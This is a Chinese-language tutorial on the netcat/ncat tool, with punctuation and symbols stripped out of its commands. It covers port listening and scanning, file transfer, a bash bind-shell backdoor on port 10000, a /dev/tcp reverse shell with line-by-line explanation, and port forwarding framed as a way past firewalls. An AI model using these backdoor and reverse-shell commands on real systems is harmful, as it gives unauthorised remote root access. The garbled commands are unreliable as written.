网络中的瑞士军刀ncnetcat命令，你用过吗？

　　ncatnc既是一个端口扫描工具，也是一款安全工具，还能是一款监测工具，它可以用来在网络上读、写以及重定向数据。同时它还能创建任意所需的连接，由于有这么多的功能，它被誉为是网络界的瑞士军刀。每个运维人员都应该知道并且掌握它。
　　在CentOS7RHEL7的最小化安装中，nc并不会默认被安装。所以需要用下列命令手工安装。〔rootlinuxtechi〕yumyinstallnmapncat
　　运维人员使用nc可以用来审计系统安全，用它来找出开放的端口然后保护这些端口。还能用它作为客户端来审计Web服务器、telnet服务器、邮件服务器等，通过nc我们可以控制发送的每个字符，也可以查看对方的回应。
　　下面看几个nc常用例子。
　　1、监听入站连接
　　完整的命令是这样的：〔rootlocalhost〕ncatlportnumber
　　通过l选项，ncat可以进入监听模式。指定该参数，则意味着nc被当作server，侦听并接受连接，而非向其它地址发起连接。
　　例如：〔rootlocalhost〕ncatl8080
　　服务器就会开始在8080端口监听入站连接。
　　2、使用nc探测端口状态
　　不同版本，nc的用法稍有不同，在CentOS6。x版本下，可以通过nc扫描系统中开放了哪些端口，例如：〔rootnnmaster〕ncnvz172。16。213。15580Connectionto172。16。213。15580port〔tcp〕succeeded！〔rootnnmaster〕ncnvz172。16。213。372023nc：connectto172。16。213。37port20（tcp）failed：Connectionrefusednc：connectto172。16。213。37port21（tcp）failed：ConnectionrefusedConnectionto172。16。213。3722port〔tcp〕succeeded！nc：connectto172。16。213。37port23（tcp）failed：Connectionrefused
　　其中：
　　？n表示直接使用ip地址，而不通过域名服务器
　　？v输出更详细的指令执行结果。
　　？z使用0输入输出模式，只在扫描通信端口时使用
　　而在CentOS7。x版本下，nc要探测端口的话，使用方法如下：ncw3IP地址端口devnullechotcpportok
　　其中，w参数是表示超时秒数，后面跟数字。
　　例如：〔rootSparkMaster〕ncw3172。16。213。1708080devnullechotcpportoktcpportok
　　如果端口是通的，那么将返回tcpportok，反之返回Ncat：Connectionrefused提示。同理，要探测udp端口状态，需要使用u参数，例如：ncuw3IP地址端口devnullechoudpportok
　　3、通过nc进行文件、目录传输
　　nc还能用来在系统间拷贝文件，虽然这么做并不推荐，因为绝大多数系统默认都安装了sshscp。不过如果恰好你遇见个没有sshscp的系统的话，你可以用nc来作为后备。
　　首先，在A机器（从这个机器拷贝数据文件，ip为172。16。213。230）启动10000端口，进入监听模式，执行如下命令：〔rootlocalhost〕ncl10000sendonlyjdk1。8。0171。tar。gz
　　接着，在B机器（拷贝文件到这台机器）执行如下命令：〔rootlocalhost〕ncn172。16。213。23010000recvonlyjdk。tar。gz
　　jdk1。8。0171。tar。gz是要发送的文件，jdk。tar。gz是传输到B机器上后的文件名。sendonly选项会在文件拷贝完后立即关闭连接。如果不加该选项，需要手工按下ctrlc来关闭连接。同理，recvonly是接收完毕后自动关闭连接。
　　发送一个文件很简单，但是如果我们想要发送多个文件，或者整个目录呢，是的，一样很简单，只需要使用压缩工具tar，压缩后发送压缩包即可，然后在接收端自动解压。
　　首先，在A机器（发送端，ip为172。16。213。230），要将prometheus目录发送到远程B主机，执行如下命令：〔rootlocalhost〕tarcvfprometheusncl10000sendonly
　　接着，在B机器执行如下命令，将接收A机器传输过来的prometheus目录，并保存到B主机的当前目录下：〔rootlocalhost〕ncn172。16。213。23010000recvonlytarxvf
　　当然，也可以选择性的指定要发送的目录，例如要发送A机器上的usrlocalnginx目录到B机器的app目录下，可以执行如下命令：
　　在A机器执行：〔rootlocalhost〕tarcvfusrlocalnginxncl10000sendonly
　　在B机器执行：〔rootlocalhost〕ncn172。16。213。23010000recvonlytarxvfCapp
　　这样执行后，A机器上的usrlocalnginx目录就发送到了B机器的app目录下了。
　　4、通过nc创建一个shell后门
　　nc命令还可以用来在系统中创建后门，并且这种技术已经被黑客大量使用，为了保护我们的系统安全，我们需要知道它是怎么做的。
　　首先，在A服务器（172。16。213。230）上执行如下命令，创建后门：〔rootlocalhostlocal〕ncatlk10000ebinbash
　　e标志将一个bash与端口10000相连。也就是说，现在客户端只要连接到服务器上的10000端口就能通过bash获取我们系统的完整访问权限。
　　k选项表示强制nc待命，当客户端从服务端断开连接后，过一段时间服务端也会停止监听。但通过选项k我们可以强制服务器保持连接并继续监听端口。
　　接着，在任意能访问172。16。213。230的10000端口的客户端上执行如下命令，即可直接登录172。16。213。230的系统。如下图所示：〔rootSparkMasternginx〕ncat172。16。213。23010000
　　5、nc反向shell的应用
　　反向shell是指在客户端打开的shell。反向shell这样命名是因为不同于其他配置，这里服务器使用的是由客户提供的服务端口。
　　首先在远端任意一个客户端主机A（IP为172。16。213。231）监听一个端口，端口可以随意指定，这里指定一个20000端口：〔rootSparkMasterindices〕ncl20000
　　这样，20000在172。16。213。231主机上已经监听起来了。
　　接着，在另一个服务器B（ip地址为172。16。213。230）上执行如下命令：〔rootlocalhostlocal〕binbashidevtcp172。16。213。2312000001
　　现在回到A主机这个客户端上来，等待一分钟后，此终端会自动进入到shell命令行，注意看，这个进入的shell就是172。16。213。230主机了。〔rootSparkMasterindices〕ncl20000〔rootlocalhost〕ifconfiggrepeth0eth0：flags4163UP，BROADCAST，RUNNING，MULTICASTmtu1500inet172。16。213。230netmask255。255。255。0broadcast172。16。213。255inet6fe80：：a00：27ff：feac：b073prefixlen64scopeid0x20linkether08：00：27：ac：b0：73txqueuelen1000（Ethernet）RXpackets17415571bytes20456663691（19。0GiB）RXerrors0dropped156975overruns0frame0TXpackets2379917bytes2031493944（1。8GiB）TXerrors0dropped0overruns0carrier0collisions0
　　看到了吧，顺利进入B服务器了，还是root用户，接下来你想干什么，都行。这个反弹shell就是先入侵B服务器，然后在客户端就可以操作B了。
　　最后，解释下上面植入的那个反弹shell和redis命令。先看这个反弹shell的内容：binbashidevtcp172。16。213。2312000001
　　首先，bashi是打开一个交互的bash，这个最简单。
　　其次，devtcp是Linux中的一个特殊设备，打开这个文件就相当于发出了一个socket调用，建立一个socket连接，读写这个文件就相当于在这个socket连接中传输数据。同理，Linux中还存在devudp。
　　接着，其实和是一个意思，都是将标准错误输出重定向到标准输出。
　　最后，01和01也是一个意思，都是将标准输入重定向到标准输出中。
　　你要问这个0、1、2是什么意思吗，那我也解释下吧，在linuxshell下，常用的文件描述符有如下三类：
　　（1）标准输入（stdin）：代码为0，使用或；
　　（2）标准输出（stdout）：代码为1，使用或；
　　（3）标准错误输出（stderr）：代码为2，使用2或2。
　　好了，基础普及完了，说下上面这个反弹shell的意思吧。综上所述，这句反弹shell的意思就是，创建一个可交互的bash和一个到172。16。213。231：20000的TCP链接，然后将bash的输入、输出错误都重定向到172。16。213。231的20000监听端口上。其中，172。16。213。231就是我的客户端主机地址。
　　6、通过nc进行端口转发
　　为什么要端口转发呢？因为防火墙，或者外网访问内网的原因。比如防火墙不允许访问本机的3389端口怎么办，或者外网要想访问一台内网机器怎么办。这时端口转发可以很好的解决这些问题。
　　常见的应用场景有：
　　（1）对于防火墙禁止访问某些端口的问题，比如3306端口，我们可以将利用机器的其它端口，比如5000端口做端口转发，从外界接受数据，转发给本机的3306端口，从而绕过防火墙。
　　（2）对于无法访问内网特定机器的问题，我们可以先抓取内网一台机器，然后利用这台主机进行端口转发，接受外网的数据，将数据转发到内网目标机器的特定端口。
　　nc实现端口转发很简单，看一个例子：
　　我们通过选项c来用nc进行端口转发，实现端口转发的语法为：〔rootlocalhost〕ncatl80cncatl8080
　　这样，所有连接到80端口的连接都会转发到8080端口。
　　下面是个具体应用案例，如下图所示：
　　从上图可以看到，通过nc成功实现了端口转发请求，可见通过nc做端口转发非常简单。